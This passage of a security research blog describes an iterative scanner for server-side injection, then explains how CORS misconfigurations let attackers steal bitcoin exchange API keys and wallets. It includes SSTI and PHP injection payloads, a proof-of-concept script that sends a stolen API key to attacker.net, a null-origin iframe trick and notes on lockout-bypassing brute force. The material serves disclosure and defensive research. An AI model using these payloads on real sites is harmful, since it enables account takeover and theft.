The design of scanners makes them easily thwarted by unexpected filters and variations. Scanners could of course send the variant payloads shown above, but those only cover three of numerous possible variations of a single vulnerability. Sending sufficient payloads to cover every variation of every vulnerability is fundamentally implausible at today's network speeds - the Million Payload Problem. Scanners are limited to sending 'best-effort' payloads, which means even something as basic as using double quotes instead of single quotes to encapsulate SQL strings can annihilate a scanner's detection capabilities.
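To get a feel for why exhaustive coverage is implausible, here's a rough Python sketch of how quickly variants multiply for just one vulnerability class. The variation dimensions below are purely illustrative - real scanners face many more axes than this:

```python
from itertools import product

# Purely illustrative variation axes for a single blind PHP code
# injection payload (a real scanner faces far more dimensions).
quotes = ['"', "'"]                        # string-encapsulation context
concats = ['.', ' . ']                     # concatenation styles
functions = ['sleep(10)',                  # plain function call
             '`sleep 10`',                 # backticks, if parentheses are filtered
             'slеep(10)']                  # Cyrillic 'е' homoglyph, if a WAF greps for 'sleep'
encodings = ['raw', 'url-encoded', 'double-url-encoded']

variants = [f'{q}{c}{f}{c}{q}' for q, c, f in product(quotes, concats, functions)]

# Three tiny axes already yield dozens of probes for ONE bug class;
# multiply by every vulnerability class and every input on the site.
total_probes = len(variants) * len(encodings)
```

Even this toy model produces 36 probes for a single injection context, which is why scanners fall back to 'best-effort' payloads.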

Blind Spot 3: Buried Vulnerabilities

Given the following HTTP request to an endpoint on Ebay that used to be vulnerable to PHP injection, where should a scanner try injecting its payloads?
GET /search/?q=david  HTTP/1.1
User-Agent: Mozilla/5.0 etc Firefox/49.0
Accept: text/html
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: session=pZGFjciI6IjAkLCJlx2V4cCI6MTA4
Connection: close
The obvious place to inject is the 'q' parameter, but that doesn't work. Neither does the Referer, User-Agent, or session cookie. An experienced pentester might think to try injecting in some headers that aren't present, like Origin, X-Forwarded-For, or X-Forwarded-Host. In this case, none of these would work either. By the time a scanner reaches this point, it's sent an awful lot of payloads without success. David Vieira-Kurz found it was possible to exploit this endpoint by passing a second q parameter, creating a malicious array server-side:
GET /search/?q=david&q[1]=sec{${phpinfo()}}
He tried this attack because the q parameter causes a search that has a spellchecker, and also filters out certain keywords, which provided a clue that something interesting was happening server-side. Here we once again have a vulnerability that a scanner could detect only if it had no constraints on the number of payloads it could send to each endpoint (or, arguably, detected spellcheckers). This example is an extreme case, but vulnerabilities in other rarely-useful inputs like the Accept-Language header are also likely to be missed.

An Alternative Approach to Scanning

At this point you know how to make an application more or less scanner-proof: code it in an obscure web language, store data with a niche NoSQL variant with non-standard syntax, and layer a couple of WAFs on top for good measure. How is it that manual testers avoid these blind spots? The fundamental difference is their concept of boring inputs versus interesting, suspicious or promising inputs. David Vieira-Kurz's observation that an input had a spellchecker directly led him to subject it to extensive auditing that would be a waste of time on a typical input.

We can learn from this. Rather than scanning for vulnerabilities, we need to scan for interesting behaviour. Then, having identified the tiny fraction of inputs that yield interesting behaviour, we can investigate further. This iterative approach to identifying vulnerabilities is both extremely flexible in what it can identify, and highly efficient. An input that doesn't yield any interesting results can be quickly discounted, saving time for sustained investigation of inputs that look more promising. The development of a scanner that uses this technique can also be approached in successive stages, as a positive feedback cycle: implement a probe, scan real applications with it, manually investigate the interesting results, and feed what you learn back into the next implementation.

Suspicious Input Transformations

The initial probe used to identify suspicious behaviour should be as simple and generic as possible. Take the following payload which exploits FreeMarker SSTI:
<#assign ex="freemarker.template.utility.Execute"?new()> ${ex("id")}
We can easily roll this back to a more generic payload that will identify most template engines using a specific popular statement syntax:
${7*7} (expect 49)
Can we expand the coverage of this to detect generic code evaluation? We could try something like:
7*7 (expect 49)
but that will only work on numeric inputs. To detect injection into strings, we need something like:
\x41 (expect A)
However, many languages, notably including SQL, don't support hex escapes. This probe can be made one step more generic, to support almost every language:
\\ (expect \)
At this point we have our very first probe for detecting suspicious input transformations. We can now move to the 'Scan' stage of the development process, trying out this payload on a range of applications and seeing what it throws up. Provided the probe is good and the testbed is large enough (more on that later), we'll get a suitably sized set of results which we can manually investigate to find out what's interesting.
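As a sketch of the core idea - this is a hypothetical helper, not the scanner's actual code - classifying the reflection of a backslash probe might look like this:

```python
def classify_reflection(probe: str, reflection: str) -> str:
    """Classify how an application reflected an escape-sequence probe.

    probe      -- what we sent, e.g. two literal backslashes
    reflection -- how it came back in the response
    """
    if reflection == probe:
        return 'boring'        # echoed verbatim: no server-side processing
    if probe == '\\\\' and reflection == '\\':
        return 'interesting'   # \\ collapsed to \ : escape processing is happening
    if reflection == '':
        return 'interesting'   # the input was swallowed entirely
    return 'unknown'           # some other transformation: worth a manual look
```

Anything other than a verbatim echo earns the input further attention - the single `\\` probe quietly covers a huge range of backend languages.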

In this case, the first step to understanding the behaviour is to look for other input transformations like \x41=>A. By comparing the application's handling of a known-bad escape sequence with other characters, we can gain subtle clues as to which characters have special significance server-side. For example, using the baseline of \zz we can easily spot the anomaly:
\zz => \zz

\" => \"
\$ => \$
\{ => {
\x41 => \x41
This tells us that the { character has special significance. Having repeated and refined this manual investigation process a few times, we can loop back around to the 'Implement' stage and automate it. Here's a screenshot of the scanner's output on a page that is vulnerable to Markdown injection:

And a page that isn't vulnerable to anything, but merely calls stripslashes() on the input:

This automated followup means that we can tell how exploitable the endpoint is at a glance. A potential further refinement would be to recognise and classify specific transformation fingerprints.
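The followup logic can be sketched as a comparison against the known-bad baseline \zz (again a hypothetical helper; the real extension works on raw HTTP responses):

```python
def special_characters(observed: dict) -> set:
    """Given a map of escape probe -> reflected output, return the
    characters whose escape sequence was handled differently from the
    baseline \\zz, which no language treats as a real escape."""
    baseline_changed = observed.get(r'\zz', r'\zz') != r'\zz'
    special = set()
    for probe, reflection in observed.items():
        # Only single-character escapes here; multi-character probes
        # like \x41 would need their own baselines.
        if len(probe) == 2 and probe.startswith('\\'):
            if (reflection != probe) != baseline_changed:
                special.add(probe[1])
    return special
```

Fed the observations from the table above, this flags { as the character with special server-side significance.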

Note that even though this technique is capable of detecting a huge range of vulnerabilities, on most inputs it only sends a single request. This combination of flexibility and efficiency is at the heart of iterative scanning.

If you're aware of (or able to construct) targets that are definitely vulnerable, you can verify the scanner's susceptibility to false negatives. I found the scanner failed to identify vulnerabilities in JSON responses, since although the server would decode \\ to \, it would then escape the \ back to \\ when embedding it in a JSON string. This was easily fixed by JSON decoding responses where appropriate.

Unfortunately, there's a more serious weakness. This approach relies on user input being reflected after it's been processed. For example, if an application places user input into a SQL SELECT statement, but never displays that query, the vulnerability will be missed entirely. This is a fundamental flaw with relying on suspicious input transformations to detect vulnerabilities.

Probe-Pair Fuzzing

Core Logic

We can avoid relying on input reflection by analysing the entire response and inferring whether our input caused a significant change. At its most basic, this is quite similar to a classic webapp fuzzer (throw input at the application and see if it crashes), and something many pentesters will be familiar with partially automating using Burp Intruder and fuzzlists. We aren't limited to naively looking at status codes and grepping for error messages - using automation, we can recognise changes as subtle as a single word or empty line disappearing.

Just like a manual tester, we can gather further information using pairs of probes. First, we identify the normal response of the application by sending a probe containing random alphanumeric characters. This will be referred to as the 'base' response. If a probe containing ' consistently gets a response that's different from the base, we can infer that the ' character has a special significance to the application. This may not indicate a vulnerability - the application might just be rejecting inputs containing '. Once again, we can use backslashes to escape our predicament. If the application responds to probes containing \' in the same way as random alphanumeric probes, we can infer that the anomalous response to ' is caused by a failure to escape the character. This might make more sense in a diagram. The smiley and sad faces represent classification as 'interesting' and 'boring' respectively:
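The same inference can be sketched in a few lines, with a toy vulnerable backend standing in for a real application (both functions are hypothetical illustrations, not the scanner's code):

```python
import re

def probe_pair_verdict(base_resp: str, quote_resp: str, escaped_resp: str) -> str:
    """Core probe-pair inference for a single-quoted string context.

    base_resp    -- response to a random alphanumeric probe
    quote_resp   -- response to a probe containing an unescaped '
    escaped_resp -- response to the same probe with the ' escaped as \\'
    """
    if quote_resp == base_resp:
        return 'boring'        # ' has no special significance here
    if escaped_resp == base_resp:
        return 'interesting'   # ' breaks something that \' repairs: likely injection
    return 'boring'            # both rejected: probably plain input filtering

def toy_app(payload: str) -> str:
    """Stand-in for a vulnerable backend: 500s whenever the quotes in
    its single-quoted SQL string end up unbalanced."""
    query = "SELECT * FROM t WHERE x = '%s'" % payload
    unescaped_quotes = len(re.findall(r"(?<!\\)'", query))
    return '200 OK' if unescaped_quotes % 2 == 0 else '500 Oops'
```

Run against the toy backend, the ' probe breaks the query and the \' probe restores it, so the input is classified as interesting.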

This technique isn't limited to identifying injection into strings. We can also identify injections into various other contexts by using alternative probe-pairs. Each additional probe pair only requires a few lines of code, so we're already using quite a few:

' vs \' // single-quoted string
' vs '' // single-quoted string (alternative escaping)
" vs \" // double-quoted string
7/0 vs 7/1 // number
${{ vs $}} // interpolation
/**/ vs /*/ // raw code
,99 vs ,1 // order-by
sprintz vs sprintf // function name
We can also string sequences of probe-pairs together to iteratively gather more information on a potential vulnerability. When faced with injection into a string, Backslash Powered Scanner will first identify the type of quote in use, then the concatenation sequence, then identify whether function calls are possible, and finally send a list of language-specific functions to try and identify the backend language. The following screenshot shows the scanner's output when pointed at an application vulnerable to Server-Side JavaScript Injection. Note that the information obtained in each stage is used by the following stage.

The scanner will still report a vulnerability even if it doesn't manage to identify the exact vulnerability: it simply displays all the successful probe-pairs. This means it effectively puts every input into one of three categories: 'boring' (no issue reported), 'vulnerable' (clearly suffers from a specific vulnerability in a known language), and 'interesting' (some probe-pairs were successful, application may be vulnerable to an unknown issue).

Types of Mutation

Applications handle modified inputs in one of two distinct ways. Most inputs vulnerable to server-side injection issues, especially those where the input originates from a free-form text field like a comment, only display a distinct response when you trigger a syntax error server-side:
/post_comment?text=baseComment     200 OK
/post_comment?text=randomtext      200 OK
/post_comment?text=random'text     500 Oops
/post_comment?text=random\'text    200 OK
On other inputs, any deviation from the expected input triggers an error:
/profile?user=bob                  200 OK
/profile?user=randomtext           500 Oops
/profile?user=random'text          500 Oops
/profile?user=random\'text         500 Oops
/profile?user=bo'||'b              200 OK
/profile?user=bo'|z'b              500 Oops
The latter case is significantly harder to handle. To find such vulnerabilities we need to skip the quote-identification stage and guess the concatenation character to find evidence of a vulnerability, making the scanner less efficient. As we can't put random text in probes, we're constrained to a limited number of unique probes which makes reliably fingerprinting responses harder. At the time of writing the scanner doesn't handle such cases, although an early prototype has confirmed it's definitely possible.

This limitation doesn't apply to detecting injections into numeric inputs - given a base number, there is an infinite number of ways to express the same number using simple arithmetic. I've opted for x/1 and x/0, since dividing by zero has the added bonus of throwing an exception in some circumstances.
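A sketch of the numeric probe pair, with toy backends (hypothetical, for illustration only) showing the inference:

```python
def numeric_probes(base: int):
    """<base>/1 evaluates back to the base value; <base>/0 divides by zero."""
    return f'{base}/1', f'{base}/0'

def looks_evaluated(resp_base: str, resp_div1: str, resp_div0: str) -> bool:
    """Arithmetic is probably being evaluated server-side if the /1 probe
    blends in with the plain value while the /0 probe stands out."""
    return resp_div1 == resp_base and resp_div0 != resp_base

def eval_app(expr: str) -> str:
    """Toy backend that genuinely evaluates its input."""
    try:
        return 'price: %d' % eval(expr)   # never do this in real code
    except ZeroDivisionError:
        return '500 Oops'

def echo_app(expr: str) -> str:
    """Toy backend that just reflects its input."""
    return 'you searched for ' + expr
```

The evaluating backend treats 7/1 like 7 and chokes on 7/0; the reflecting backend treats all three differently, so it's correctly left alone.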

Recognising Significant Response Differences

The technical challenge at the heart of this technique is recognising when an application's response to two distinct probes is consistently different. A simple string comparison is utterly useless on real world applications, which are notoriously dynamic. Responses are full of dynamic one-time tokens, timestamps, cache-busters, and reflections of the supplied input.

When I approached this challenge three years ago, I used the intuition that responses are composed of static content with dynamic 'fuzzy points'. I therefore tried to use a set of responses to generate a regular expression by stitching together blocks of static content (identified using the longest-common-subsequence algorithm) with wildcards. For reasons of brevity, I'll only mention a small sample of the crippling issues with this approach. For a start, it's computationally intensive - the longest-common-subsequence implementation I used was O(n²): the time it took to process a response was proportional to the square of the response's length. The regular expressions were often so complex that scanning the wrong application caused a denial of service on the scanner itself. The approach also fails to account for applications giving drastically different responses which are difficult to regex together, or shuffling the order of response content. Even timestamps in responses raise difficulties, because parts of them by definition only change every 10, 60, or 100 seconds. Finally, it's extremely difficult to debug - identifying why a particular response doesn't match a 500-line regular expression can be tricky. Each of these problems may sound solvable, but trying to solve them is why this code wasn't released two years ago.

Instead, Backslash Powered Scanner uses the simpler approach of calculating a number of attributes for each response, and noting which ones are consistent across responses. Attributes include the status code, content type, HTML structure, line count, word count, input reflection count, and the frequency of various keywords.
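The attribute approach can be sketched as follows - the attribute set here is an illustrative subset of the ones the article lists, not the extension's exact implementation:

```python
import re

KEYWORDS = ('error', 'exception', 'invalid', 'sql', 'warning')

def fingerprint(status: int, body: str) -> dict:
    """Reduce a response to cheap, diff-friendly attributes."""
    fp = {
        'status': status,
        'lines': body.count('\n'),
        'words': len(body.split()),
        'tags': len(re.findall(r'<[a-zA-Z]', body)),  # rough HTML tag count
    }
    lowered = body.lower()
    for kw in KEYWORDS:
        fp['kw_' + kw] = lowered.count(kw)
    return fp

def stable_attributes(fingerprints: list) -> dict:
    """Keep only the attributes that hold the same value across every
    response in the set - these are the ones usable for spotting
    probe-induced differences on a dynamic application."""
    first = fingerprints[0]
    return {k: v for k, v in first.items()
            if all(fp[k] == v for fp in fingerprints[1:])}
```

On a dynamic page, volatile attributes like the word count drop out of the stable set automatically, while attributes like the status code survive and can be trusted for diffing.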

The selection and delivery of probes is also crucial in minimising diffing problems. To differentiate between response differences due to non-determinism and differences caused by our probes, it's necessary to send each pair of probes multiple times. A scanner that simply alternates between two payloads will fail and report false positives when confronted with an application that happens to alternate between two distinct responses, so it's important to mix up the probe order. Some particularly pernicious applications reflect deterministic transformations of user input, or even use user input to seed the choice of testimonial quote. To remedy this, rather than probe-pairs we use pairs of sets of slightly different probes. Finally, caches can make 'random' content appear permanent, but this can easily be fixed using a cache buster.

Hunting Findings

Scanning Distributed Systems

Seeking to evaluate the scanner on real-world systems and having a relatively limited supply of pentests, I decided to run it on every website within scope of a bug bounty program that doesn't disallow automated testing. This is a couple of thousand domains by my calculation. As a courtesy (and to avoid being IP-banned), I needed to throttle the scanner to ensure it only sent one request per three seconds to each application. Burp Suite only supports per-thread throttling, so I've coded and released an extension that implements a per-host throttle. This extension also enables interleaving scan items on different hosts to ensure the overall scanner speed is still decent, and generating host-interleaved lists of unfetched pages for efficient throttled crawling. It also makes some other minor optimisations to improve scan speed without significantly reducing coverage, such as only scanning unpromising parameters like cookies once per host per response type.

Sample Results

To illustrate the types of findings the scanner provides and how to interpret them, I'll take a look at selected results from this experiment. It may help to think of Backslash Powered Scanner as less like a vulnerability scanner, and more like an eager assistant with limited technical understanding.

MySQL Injection

The following result came from a site that was vulnerable to SQL injection via the User-Agent header:

Basic fuzz  (\z`z'z"\ vs \`z\'z\"\\)
    Content: 5357 vs 5263

String - apostrophe  (\zz'z vs z\\\'z)
    Content: 5357 vs 5263

Concatenation: '||  (z||'z(z'z vs z(z'||'z)
    Content: 5357 vs 5263

Basic function injection  ('||abf(1)||' vs '||abs(1)||')
    Content: 5281 vs 5263

MySQL injection  ('||power(unix_timestanp(),0)||' vs '||power(unix_timestamp(),0)||')
    Content: 5281 vs 5263
The scanner identified that the input was interesting, and correctly identified the exact vulnerability by injecting a function that only exists in MySQL. The 'Content: 5357 vs 5263' line indicates the attribute the scanner used to distinguish the two results - in this case, the word count of the two responses differs. When this much evidence is displayed, the issue is extremely unlikely to be a false positive.

Filtered Code Injection

The following finding comes from a pentest of a site that had already been tested numerous times, and clearly shows the power of this scanner:

String - doublequoted (\zz" vs \")
    error: 1 vs 0
    Content: 9 vs 1
    Tags: 3 vs 0

Concatenation: ". (z."z(z"z vs z(z"."z)
    error: 1 vs 0
    Content: 9 vs 1
    Tags: 3 vs 0

Interpolation - dollar (z${{z vs }}$z)
    error: 1 vs 0
    Content: 9 vs 1
    Tags: 3 vs 0
This was vulnerable to PHP code injection, but parentheses were being filtered out by the application - it's the second of the three blind spots of classic scanners mentioned earlier. Because parentheses are being filtered, the scanner has failed to inject a function, but we can execute arbitrary shell commands manually with a little effort.

I think the reason this vulnerability was missed by previous pentesters is that the injection was in the file path, which perhaps isn't somewhere a time-pressured tester would bother to manually check for code injection vulnerabilities. Why the application was calling eval() on the path remains a mystery. It's the kind of behaviour you expect from an internet of things device, not a household name website.

Old vulnerability

The following finding shows the current status of the input on Ebay that was previously vulnerable to PHP code injection (blind spot #3). We can clearly see that the application responds differently to any input containing the { character.

Note that the responses demonstrate a behaviour opposite to what a naive fuzzer might expect - the string intended to break the application, ${{z, causes a 200 OK response, whereas the harmless string causes a 500 Internal Server Error. Even though the search function is broken, the scanner has identified a trace of the vulnerability that used to be there. Since the scanner is so efficient, it's perfectly plausible to try the PHP array-bypass attack on every input.

Regular Expression Injection

The scanner reported quite a few regex injection vulnerabilities, using both the input-transformation and diffing techniques. This is typically a low severity issue - it can be used to interfere with application logic and perhaps cause a denial of service (ReDoS) but little else. An exception is on servers running PHP<5.4.7, where regex injection can be escalated to arbitrary code execution by using a null byte to specify the 'e' flag. This technique was recently used to exploit phpMyAdmin, and I've verified that the scanner finds it. Regex injection is typically reported with the following fingerprint:
Diffing scanner:
Backslash  (\ vs \\)

Transformation Scanner:
\0 => Truncated
\1 => Truncated
\$ => $
$ => $
Backreferences like \0 offer a simple way to recognise regex injection. Applications may treat \99 differently from \100, and expand lower groups like \0 or \1 to other strings:

GET /folder?q=foo\0bar HTTP/1.1

HTTP/1.1 301 Moved Permanently

Escaping Flaws

The scanner noticed a cute but useless flaw in the way a popular web framework escapes values to be put into cookies:
foo"z: Set-Cookie: bci=1234; domain="foo\"z";
foo\: Set-Cookie: bci=1234; domain="foo\";
foo"z\: 500 Internal Server Error
This framework proved so popular that I added a followup probe to automatically classify this issue and prevent anyone wasting time on it:
Basic fuzz  (\z`z'z"\ vs \`z\'z\"\\)
    exception: 1 vs 0
Doublequote plus slash  (z"z\ vs z\z)
    exception: 1 vs 0

Semantic False Positives

The function injection detection code raised a single false positive:

Function hijacking (sprintg vs sprintf)
<div: 13 vs 14
The root problem is evident from the URL: the q input is being used to search a large codebase, where 'sprintf' is naturally a far more common term than 'sprintg'. Search functions are frequently ranked as interesting by the scanner, particularly those that support advanced syntax, as they can appear deceptively similar to code injection vulnerabilities.

Web Application Firewall

Web Application Firewalls provide another source of 'interesting' behaviour. The scanner noticed that inline comments were being ignored on an otherwise value-sensitive input:

0/**z'*/ vs 0/*/*/z'*/
Manual investigation revealed that even HTML comments were being ignored... and also iframes.
0<!--foo--> vs 0<!--foo->
0<iframe> vs 0<zframe>
It looks like a Web Application Firewall (WAF) is rewriting input to remove comments and potentially harmful HTML. This is good to know - input rewriting effectively disables browsers' XSS filters. As ever, we can automate the HTML-comment followup to prevent this WAF from being a recurring distraction.

SOLR JSON Injection

The scanner flagged some interesting behaviour exhibited by a search function:

Basic fuzz (\z`z'z"\ vs \`z\'z\"\\)
    Content: 1578 vs 1575
Backslash (\ vs \\)
    Content: 1576 vs 1575
String - doublequoted (\zz" vs \")
    Content: 1578 vs 1575
Manual testing revealed that the application was decoding unicode-escaped input too - searching for \u006d\u0069\u0072\u0072\u006f\u0072 returned the same results as searching for 'mirror'. It appeared that user input was being embedded into a JSON string without escaping, enabling us to break out of the search string and alter the query structure.

Lessons Learned

These examples clearly show that the probe iteration process is crucial - it means that at a glance, we can distinguish a clearly critical issue from something that may take untold hours of investigation to classify. At present, search functions, WAFs and regex injections are a persistent source of promising looking behaviour that doesn't normally lead anywhere useful. Due to the flexibility of the probe-pair approach, almost every dud lead we encounter can be automatically classified in future with a followup probe.

We've also seen that the scanner can identify information that is useful even though it doesn't directly cause a vulnerability.

Many of these vulnerabilities were found on applications protected by WAFs - it appears that the simplicity of the payloads used makes them slip past WAFs unnoticed. However, I found that per-host rate limiting won't keep you off the radar of certain distributed firewall solutions that share IP-reputation scores; I managed to get the office IP banned from one such target without sending a single packet to it.

Further Research

The techniques and code used in the scanner can be adapted to detect far more than server-side injection vulnerabilities. We've already seen that followup probe pairs can be used to identify both WAFs and search functions.

Enumerable Input Detection

Applications frequently suffer from access control bypasses where attackers can perform unauthorised operations simply by incrementing a number, for example on a URL like /edit_profile?id=734

We can automate detection of inputs where it's possible to obtain additional data by incrementing a number. First, confirm that id=734, id=735, and id=736 return distinct responses. Fetching three distinct responses shows that the id input is being used, and that we're getting more than an 'invalid id' message. However, the application might just be performing a fixed transformation on the input or using it to seed an RNG. By requesting id=100734 and id=100735, and confirming they match, we can verify that we're retrieving data from a finite set.
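The check above can be sketched as follows (fetch is any function mapping an id to a response; the ids are the hypothetical ones from the example):

```python
def looks_enumerable(fetch) -> bool:
    """Heuristic enumerable-input check.

    1. id=734, 735 and 736 must all return distinct responses: the id
       is being used, and we're getting more than an 'invalid id' page.
    2. id=100734 and id=100735 must return matching responses: this
       rules out fixed transformations of the input (or input-seeded
       randomness), suggesting a finite set of real records.
    """
    low = [fetch(i) for i in (734, 735, 736)]
    if len(set(low)) != 3:
        return False
    return fetch(100734) == fetch(100735)
```

A backend serving real records passes both steps, while one applying a deterministic transformation to any id fails the second.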

Cold-start Bruteforce Attacks

Pentesters are often in a situation where they want to bruteforce a value, but don't know what the success condition looks like. I made the earliest version of this scanner on a pentest where an ill-prepared client had failed to provide me with a single valid username, let alone a password. In order to stand a chance of guessing a valid password I had to bruteforce a username first, but the response to a valid username might be only subtly different, and I couldn't manually review thousands of login attempts. Using the response attribute diffing technique, this attack can be reliably automated. This approach can even bypass anti-bruteforce measures; when testing this tool I found that one target gave a slightly distinct response to login attempts with a valid password, even when the account was locked due to excessive login attempts.

Bruteforcing file and folder names on servers that don't provide helpful 404 codes raises a similar challenge. With a few modifications, we could also use this technique to bruteforce hidden parameters to find mass-assignment vulnerabilities, and perhaps even bruteforce valid objects for deserialization exploits.


Conclusion

Classic scanners have several serious blind spots when it comes to identifying server-side injection vulnerabilities. By modelling the approach of an experienced manual tester, I have created a scanner that avoids these blind spots and is extremely efficient. It currently classifies inputs as either boring, interesting, or vulnerable to a specific issue. Issues classified as interesting require manual investigation by security experts, so at present this tool is primarily useful only to security experts. However, the scanner can be adapted to classify individual issues, so over time the proportion of issues classified as 'interesting' instead of 'vulnerable' should drop, making it suitable for a broader range of users.

Friday, October 14, 2016

Exploiting CORS Misconfigurations for Bitcoins and Bounties

(or CORS Misconfiguration Misconceptions)

This is a greatly condensed version of my AppSec USA talk. If you have time (or struggle to understand anything) I highly recommend checking out the slides and watching the video.

Cross-Origin Resource Sharing (CORS) is a mechanism for relaxing the Same Origin Policy to enable communication between websites via browsers. It’s widely understood that certain CORS configurations are dangerous, but some associated subtleties and implications are easily misunderstood. In this post I’ll show how to critically examine CORS configurations from a hacker’s perspective, and steal bitcoins.

CORS for Hackers

Websites enable CORS by sending the following HTTP response header:
Access-Control-Allow-Origin:
This permits the listed origin (domain) to make visitors’ web browsers issue cross-domain requests to the server and read the responses - something the Same Origin Policy would normally prevent. By default this request will be issued without cookies or other credentials, so it can’t be used to steal sensitive user-specific information like CSRF tokens. The server can enable credential transmission using the following header:
Access-Control-Allow-Credentials: true
This creates a trust relationship - an XSS vulnerability on the trusted origin is bad news for this site.

Hidden in plain sight

Trusting a single origin is easy. What if you need to trust multiple origins? The specification suggests that you can simply specify a space-separated list of origins, eg:
Access-Control-Allow-Origin:
However, no browsers actually support this.

You might also want to use a wildcard to trust all your subdomains, by specifying something like:
Access-Control-Allow-Origin: *
But that won't work either. The only valid wildcard origin is '*' on its own - partial wildcards are not supported.

There's a hidden safety catch in CORS, too. If you try to disable the SOP entirely and expose your site to everyone by using the following terrifying looking header combination:
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
Then you’ll get the following error in your browser console:
“Cannot use wildcard in Access-Control-Allow-Origin when credentials flag is true.”
This exception is mentioned in the specification, and also backed up by Mozilla’s documentation:
"when responding to a credentialed request, server must specify a domain, and cannot use wild carding"
In other words, using a wildcard effectively disables the Allow-Credentials header.

As a result of these limitations, many servers programmatically generate the Access-Control-Allow-Origin header based on the user-supplied Origin value. If you see a HTTP response with any Access-Control-* headers but no origins declared, this is a strong indication that the server will generate the header based on your input. Other servers will only send CORS headers if they receive a request containing the Origin header, making associated vulnerabilities extremely easy to miss.

Credentials and bitcoins

So, plenty of websites derive allowed origins from user input. What could possibly go wrong? I decided to assess a few bug bounty sites and find out. Note that as these sites all have bug bounty programs, every vulnerability I mention has been missed by numerous other bounty hunters.

I quickly replicated Evan Johnson's finding that many applications make no attempt to validate the origin before reflecting it, and identified a vulnerable bitcoin exchange (which sadly prefers to remain unnamed):
GET /api/requestApiKey HTTP/1.1
Host: <redacted>
Origin: https://attacker.example
Cookie: sessionid=...

HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://attacker.example
Access-Control-Allow-Credentials: true

{"[private API key]"}
Making a proof of concept exploit to steal users' private API keys was trivial:
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://btc-exchange/api/requestApiKey',true);
req.withCredentials = true;
req.send();

function reqListener() {
    location='//attacker.net/log?key='+this.responseText;
};
After retrieving a user's API key, I could disable account notifications, enable 2FA to lock them out, and transfer their bitcoins to an arbitrary address. That’s pretty severe for a header misconfiguration. Resisting the urge to take the bitcoins and run, I reported this to their bug bounty program and it was patched within an astounding 20 minutes.

Some websites make classic URL parsing mistakes when attempting to verify whether an origin should be trusted. For example, a site which I'll call advisor.com trusts all origins that end in advisor.com, including notadvisor.com. Even worse, a second bitcoin exchange (let's call it btc.net) trusted all origins that started with https://btc.net, including https://btc.net.evil.net. Unfortunately the site unexpectedly and permanently ceased operations before I could build a working proof of concept. I won't speculate as to why.
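Both mistakes boil down to raw substring checks on the Origin value. A hypothetical reconstruction of each broken validator (all domain names are placeholders):

```javascript
// Suffix check without a leading dot: matches anything *ending* in the domain.
function trustsBySuffix(origin) {
  return origin.endsWith('advisor.com');
}

// Prefix check: matches anything *starting* with the trusted origin.
function trustsByPrefix(origin) {
  return origin.startsWith('https://btc.net');
}

console.log(trustsBySuffix('https://notadvisor.com'));   // true - attacker-registrable
console.log(trustsByPrefix('https://btc.net.evil.net')); // true - attacker-controlled
```

In both cases an attacker can register a domain that passes the check while being entirely under their control.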

The null origin

If you were paying close attention earlier, you might have wondered what the 'null' origin is for. The specification mentions it being triggered by redirects, and a few stackoverflow posts show that local HTML files also get it. Perhaps due to the association with local files, I found that quite a few websites whitelist it, including Google's PDF reader:
GET /reader?url=zxcvbn.pdf
Origin: null

HTTP/1.1 200 OK
Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true
and a certain third bitcoin exchange. This is great for attackers, because any website can easily obtain the null origin using a sandboxed iframe:
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src='data:text/html,<script>*cors stuff here*</script>'></iframe>

Using a sequence of CORS requests, it was possible to steal encrypted backups of users' wallets, enabling an extremely fast offline brute-force attack against their wallet password. If anyone's password wasn't quite up to scratch, I'd get their bitcoins.
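A minimal sketch of how such an exploit page can be assembled - a helper that wraps attacker JavaScript in the sandboxed-iframe payload shown above. The target URL and script body are hypothetical:

```javascript
// The attacker JS runs from a data: URL inside a sandboxed iframe,
// so the browser assigns it the 'null' origin.
function buildNullOriginIframe(attackerJs) {
  const doc = '<script>' + attackerJs + '</scr' + 'ipt>';
  return '<iframe sandbox="allow-scripts allow-top-navigation allow-forms" ' +
         "src='data:text/html," + encodeURIComponent(doc) + "'></iframe>";
}

// Hypothetical payload: a credentialed request issued from the null origin.
const payload = buildNullOriginIframe(
  "var r=new XMLHttpRequest();" +
  "r.open('get','https://target.example/api/secret',true);" +
  "r.withCredentials=true;r.send();"
);
console.log(payload);
```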

This particular misconfiguration is surprisingly common - if you look for it, you'll find it. The choice of the keyword 'null' is itself a tad unfortunate, because failing to configure an origin whitelist in certain applications may result in...
Access-Control-Allow-Origin: null

Breaking HTTPS

During this research I found two other prevalent whitelist implementation flaws, which often occur at the same time. The first is blindly whitelisting all subdomains - even non-existent ones. Many companies have subdomains pointing to applications hosted by third parties with awful security practices. Trusting that these don't have a single XSS vulnerability and never will in future is a really bad idea.

The second common error is failing to restrict the origin protocol. If a website is accessed over HTTPS but will happily accept CORS interactions from http://wherever, someone performing an active man-in-the-middle (MITM) attack can pretty much bypass its use of HTTPS entirely. Strict Transport Security and secure cookies will do little to prevent this attack. Check out the presentation recording when it lands for a demo of this attack.
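For contrast, a validation sketch that avoids both flaws by exact-matching full origins, scheme included (the whitelist contents are invented):

```javascript
// Exact-match origin validation: scheme, host and port must all match.
const TRUSTED_ORIGINS = [
  'https://app.example.com',
  'https://admin.example.com'
];

function isTrustedOrigin(origin) {
  return TRUSTED_ORIGINS.includes(origin);
}

console.log(isTrustedOrigin('https://app.example.com'));          // true
console.log(isTrustedOrigin('http://app.example.com'));           // false - plain HTTP rejected
console.log(isTrustedOrigin('https://app.example.com.evil.net')); // false
```

Because the comparison is an exact string match, neither suffix/prefix tricks nor protocol downgrades pass the check.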

Abusing CORS Without Credentials

We've seen that with credentials enabled, CORS can be highly dangerous. Without credentials, many attacks become irrelevant; it means you can't ride on a user's cookies, so there is often nothing to be gained by making their browser issue the request rather than issuing it yourself. Even token fixation attacks are infeasible, because any new cookies set are ignored by the browser.

One notable exception is when the victim's network location functions as a kind of authentication. You can use a victim’s browser as a proxy to bypass IP-based authentication and access intranet applications. In terms of impact this is similar to DNS rebinding, but much less fiddly to exploit.

Vary: Origin 

If you take a look at the 'Implementation Considerations' section in the CORS specification, you'll notice that it instructs developers to specify the 'Vary: Origin' HTTP header whenever Access-Control-Allow-Origin headers are dynamically generated.

That might sound pretty simple, but immense numbers of people forget, including the W3C itself, leading to this fantastic quote:
"I must say, it doesn't make me very confident that soon more sites will be supporting CORS if not even the W3C manages to configure its server right" - Reto Gmür
